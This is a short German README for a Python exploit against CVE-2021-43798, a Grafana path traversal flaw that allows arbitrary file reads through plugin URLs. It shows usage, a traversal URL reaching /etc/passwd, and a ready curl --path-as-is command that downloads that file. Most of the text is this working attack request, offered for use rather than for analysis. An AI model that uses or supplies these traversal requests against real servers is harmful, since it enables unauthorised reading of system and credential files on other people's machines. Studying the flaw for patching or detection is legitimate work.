
Python-Exploit für CVE-2021-43798, eine Grafana-Pfadtraversal-Schwachstelle, die das beliebige Lesen von Dateien über Verzeichnistraversal in Plugin-URLs ermöglicht.
Verwendung: grafana-exploit.py [-h] -H/--host HOST grafana-exploit.py: Fehler: die folgenden Argumente sind erforderlich: -H/--host
Beispiel: python3 grafana-exploit.py --host <target_host>
Wenn das Auslesen einer beliebigen Datei erfolgreich ist werden die Anfrage-URL und der Curl-Befehl angezeigt
[+]RequestURL
http://example.host/public/plugins/loki/../../../../../../../../../../../../../etc/passwd
[+]curl_command
curl --path-as-is "http://example.host/public/plugins/loki/../../../../../../../../../../../../../etc/passwd"
Wenn Sie die Datei also herunterladen möchten, führen Sie den Befehl wie oben aus
curl --path-as-is "http://example.host/public/plugins/loki/../../../../../../../../../../../../../etc/passwd" -o passwd